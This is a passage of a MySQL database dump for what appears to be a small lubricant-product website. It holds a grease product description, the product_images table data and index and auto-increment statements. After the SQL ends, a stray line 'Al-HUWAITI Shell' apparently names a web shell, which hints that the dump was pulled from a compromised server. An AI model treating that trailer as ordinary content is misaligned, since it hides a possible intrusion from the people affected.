(2339, 5, 0, 0, 'Girth Gear Grease', 0, 0, 0, '610148298_6.png', '<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px; letter-spacing:0em\">Lithium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 0/1/2</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Drop Point: 180&deg; -200&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER/ Black</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align: left;\"><strong>18 kg Bucket, 180 kg Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `product_images`
--

CREATE TABLE `product_images` (
  `id` int(11) NOT NULL,
  `product_id` int(11) NOT NULL,
  `product_images` varchar(250) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `product_images`
--

INSERT INTO `product_images` (`id`, `product_id`, `product_images`) VALUES
(1, 21, '437000749_RMG-C0001_compressed_1597922195.jpg'),
(8, 19, '699039219_pexels-jacp-3421636.jpg'),
(9, 19, '524109163_pexels-alessandro-oliverio-611273-1472237.jpg'),
(14, 13, '172387246_11.jpeg'),
(15, 13, '173573363_2.jpg'),
(16, 13, '691137357_13.jpeg'),
(17, 13, '540735132_WhatsApp Image 2023-05-09 at 2.15.10 PM.jpeg'),
(18, 10, '284109100_3.webp'),
(19, 10, '873662805_8.webp'),
(21, 15, '144380620_ST-03.jpg'),
(22, 15, '448202484_ST -02.jpg'),
(23, 14, '292377193_1.webp'),
(24, 14, '808467906_3.webp'),
(25, 11, '639107670_2.png'),
(26, 11, '309644127_3.jpg'),
(27, 19, '320428248_AnyConv.com__20240229_101427.jpg');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `admin_users`
--
ALTER TABLE `admin_users`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `banner`
--
ALTER TABLE `banner`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `categories`
--
ALTER TABLE `categories`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `firstbanner`
--
ALTER TABLE `firstbanner`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `gallary`
--
ALTER TABLE `gallary`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `product`
--
ALTER TABLE `product`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `product_images`
--
ALTER TABLE `product_images`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `admin_users`
--
ALTER TABLE `admin_users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `banner`
--
ALTER TABLE `banner`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `categories`
--
ALTER TABLE `categories`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `firstbanner`
--
ALTER TABLE `firstbanner`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `gallary`
--
ALTER TABLE `gallary`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=15;

--
-- AUTO_INCREMENT for table `product`
--
ALTER TABLE `product`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2340;

--
-- AUTO_INCREMENT for table `product_images`
--
ALTER TABLE `product_images`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=29;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

Al-HUWAITI Shell